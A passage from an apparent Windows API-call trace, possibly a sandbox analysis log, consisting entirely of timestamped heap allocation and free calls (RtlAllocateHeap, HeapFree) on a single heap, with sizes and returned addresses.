0x7a37b8 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a37d0 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a32a8 [0026.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37a0 | out: hHeap=0x770000) returned 1 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a37a0 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a37e8 [0026.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37b8 | out: hHeap=0x770000) returned 1 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a37b8 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3800 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7a3ac8 [0026.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3640 | out: hHeap=0x770000) returned 1 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3818 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796350 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3830 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796378 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a32b8 [0026.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x796350 | out: hHeap=0x770000) returned 1 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3848 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3860 [0026.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3830 | out: hHeap=0x770000) returned 1 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3830 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2) returned 0x7a32c8 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3878 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3890 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a32d8 [0026.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a32c8 | out: hHeap=0x770000) returned 1 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a38a8 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a38c0 [0026.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3878 | out: hHeap=0x770000) returned 1 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3878 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1c) returned 0x796350 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a38d8 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7963a0 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a32c8 [0026.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x796350 | out: hHeap=0x770000) returned 1 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a38f0 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3908 [0026.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38d8 | out: hHeap=0x770000) returned 1 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a38d8 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3920 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3938 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3950 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3968 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xac) returned 0x7a3bd0 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3980 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3998 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a39b0 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a39c8 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a39e0 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a39f8 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3a10 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3a28 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3a40 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3a58 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3a70 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3a88 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3aa0 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3ca0 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3cb8 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3cd0 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3ce8 [0026.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3d00 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3d18 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3d30 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3d48 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3d60 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3d78 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3d90 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3da8 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3dc0 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3dd8 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3df0 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3e08 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3e20 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3e38 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3e50 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3e68 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3e80 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3e98 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3eb0 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3ec8 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3ee0 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3ef8 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3f10 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3f28 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3f40 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3f58 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3f70 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3f88 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3fa0 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3fb8 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3fd0 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3fe8 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a4000 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a4018 [0026.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a4030 [0026.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a4048 [0026.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a4060 [0026.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a40a0 [0026.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a40b8 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a7e0 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a8a0 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a888 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a870 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a900 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a8b8 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a8d0 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a960 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a918 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a930 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9c0 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9a8 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a978 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa08 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9f0 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9d8 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa20 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa38 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa98 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa50 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa68 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aab0 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aac8 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab28 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aae0 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aaf8 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab40 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab58 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a36e0 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab70 | out: hHeap=0x770000) returned 1 [0026.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab88 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a36f8 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3710 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3758 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3740 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3728 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3770 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3788 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37e8 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37a0 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37b8 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3800 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3818 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3860 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3848 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3830 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38c0 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38a8 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3878 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3908 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38f0 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38d8 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3920 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3938 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3950 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3968 | out: hHeap=0x770000) returned 1 [0026.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3968 [0026.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3950 [0026.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a32e8 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3950 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a32e8 | out: hHeap=0x770000) returned 1 [0026.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3968 | out: hHeap=0x770000) returned 1 [0026.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3968 [0026.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x79a630 [0026.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3950 [0026.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796350 [0026.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a32e8 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a630 | out: hHeap=0x770000) returned 1 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3938 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3920 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3950 | out: hHeap=0x770000) returned 1 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3950 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7963c8 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a38d8 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a38f0 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3908 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3878 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3968 | out: hHeap=0x770000) returned 1 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3920 | out: hHeap=0x770000) returned 1 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3938 | out: hHeap=0x770000) returned 1 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3950 | out: hHeap=0x770000) returned 1 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6) returned 0x7a32f8 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3950 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3308 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3950 | out: hHeap=0x770000) returned 1 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x770000) returned 1 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a32f8 | out: hHeap=0x770000) returned 1 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3950 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3938 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3920 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3968 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a32f8 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3938 | out: hHeap=0x770000) returned 1 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3938 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a38a8 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3920 | out: hHeap=0x770000) returned 1 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3920 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3308 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a38c0 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3830 [0026.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3318 [0026.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x770000) returned 1 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3848 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3860 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38c0 | out: hHeap=0x770000) returned 1 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x7a38c0 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3818 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3308 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3818 | out: hHeap=0x770000) returned 1 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x770000) returned 1 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38c0 | out: hHeap=0x770000) returned 1 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a38c0 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe) returned 0x7a3818 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3800 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3308 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3800 | out: hHeap=0x770000) returned 1 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x770000) returned 1 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3818 | out: hHeap=0x770000) returned 1 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3818 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12) returned 0x79a630 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7963f0 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3308 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7963f0 | out: hHeap=0x770000) returned 1 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x770000) returned 1 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a630 | out: hHeap=0x770000) returned 1 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3800 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a37b8 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a37a0 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a37e8 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3788 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3770 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2) returned 0x7a3308 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3728 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3740 [0026.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3328 [0026.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x770000) returned 1 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3758 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3710 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3728 | out: hHeap=0x770000) returned 1 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3728 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a36f8 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3c) returned 0x781f88 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a36e0 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a40d0 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a40e8 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a4100 [0026.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a4118 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3950 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38a8 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3938 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3920 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3860 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3848 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38c0 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3818 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3800 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37b8 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 